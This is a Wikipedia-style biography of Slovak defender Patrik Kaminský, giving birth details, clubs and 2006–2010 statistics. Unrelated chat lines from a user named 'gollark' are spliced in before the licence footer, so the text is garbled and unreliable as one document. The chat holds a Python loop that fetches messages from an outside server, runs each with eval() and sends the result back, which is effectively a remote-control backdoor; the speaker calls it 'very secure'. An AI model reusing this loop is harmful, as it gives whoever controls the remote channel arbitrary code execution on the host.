Patrik Kaminský
Patrik Kaminský (born 27 October 1978 in Prešov) is a professional Slovak football defender who currently plays for the 3. liga club FC Lokomotíva Košice.
Personal information | |||
---|---|---|---|
Date of birth | 27 October 1978 | ||
Place of birth | Prešov, Czechoslovakia | ||
Height | 1.89 m (6 ft 2 in) | ||
Playing position(s) | Centre back | ||
Club information | |||
Current team | Lokomotíva Košice | ||
Number | 3 | ||
Youth career | |||
Tatran Prešov | |||
Senior career* | |||
Years | Team | Apps | (Gls) |
2001–2005 | Ličartovce | ||
2005–2009 | MFK Košice | 80 | (3) |
2010 | FK Bodva | ||
2010–2011 | Odeva Lipany | ||
2011– | Lokomotíva Košice | ||
* Senior club appearances and goals counted for the domestic league only and correct as of 2 August 2011 |
Career statistics
Club | Season | League | Domestic Cup | Europe | Total | ||||
---|---|---|---|---|---|---|---|---|---|
Pld | GF | Pld | GF | Pld | GF | Pld | GF | ||
MFK Košice | 2006/07 | 28 | 0 | 1 | 0 | 0 | 0 | 29 | 0 |
2007/08 | 20 | 0 | 4 | 0 | 0 | 0 | 24 | 0 | |
2008/09 | 20 | 2 | 4 | 0 | 0 | 0 | 24 | 2 | |
2009/10 | 12 | 1 | 4 | 0 | 3 | 0 | 19 | 1 | |
Total | 80 | 3 | 13 | 0 | 3 | 0 | 96 | 3 |
Last updated: 28 December 2009
gollark: Your ISP might.
gollark: Probably not?
gollark: Plus, unlike the old version, it only uses builtin python modules.
gollark: It's very secure.
gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: res = data["result"]["data"] try: send(repr(eval(res))) except Exception as e: send(repr(e))```Using the new SPUDNET-HTTP API.
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.